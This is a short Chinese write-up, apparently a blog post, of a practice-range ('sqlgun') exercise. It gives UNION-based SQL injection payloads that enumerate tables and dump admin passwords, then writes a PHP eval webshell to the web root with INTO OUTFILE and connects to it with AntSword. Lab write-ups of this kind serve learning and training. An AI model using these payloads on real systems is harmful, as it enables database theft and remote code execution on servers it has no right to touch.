当前位置: 首页 > news >正文

sqlgun靶场训练

news 2025/5/4 22:01:17

1.看到php?id=  ,然后刚好有个框,直接测试sql注入

2.发现输入1' union select 1,2,3#的时候在2处有回显

3.查看表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

4.查看列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

5.查看admin的密码

-1' union select 1,group_concat(id,admin,password),3 from admin #

6.目录扫描发现有一个phpinfo.php,访问绝对路径

6.构造一句话木马语句

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/q.php' #

7.蚁剑连接

8.根目录找到flag


http://www.mrgr.cn/news/26116.html

相关文章:

  • Linux入门攻坚——32、Mini Linux制作
  • BASM引领2024国家网络安全宣传周:智能守护,打造全方位业务与应用安全监测平台
  • 我们身边的数据:从体育到家务管理
  • uniapp与webview进行数据通信
  • 项目中使用简单的立体3D柱状图,不用引入外部组件纯css也能实现
  • ant.design【点击展示详细信息】
  • Beyond Compare 4 秘钥
  • Kubernetes从零到精通(10-服务Service)
  • springboot高校医务室管理系统-计算机毕业设计源码58407
  • oracle 用游标为什么会比for循环慢?
  • 《ChatTTS一键安装详细教程》
  • 晃电的危害及抗晃电的技术措施
  • 为何初创数字影像企业纷纷选择入驻孵化基地?
  • 【C++ 高频面试题】STL 你了解多少呢?vector 的底层实现原理
  • CloudFlare问题与CDN问题
  • 摊牌了!一文教会你轻松上手豆包MarsCode 编程助手!
  • 【生产力必备工具】GPU加速计算的首选云服务——蓝耘GPU(点击我的链接注册登录,可获50使用卷)
  • 软件设计基础知识(6)
  • ELK在Linux服务器下使用docker快速部署(超详细)
  • 苍穹外卖学习笔记(五)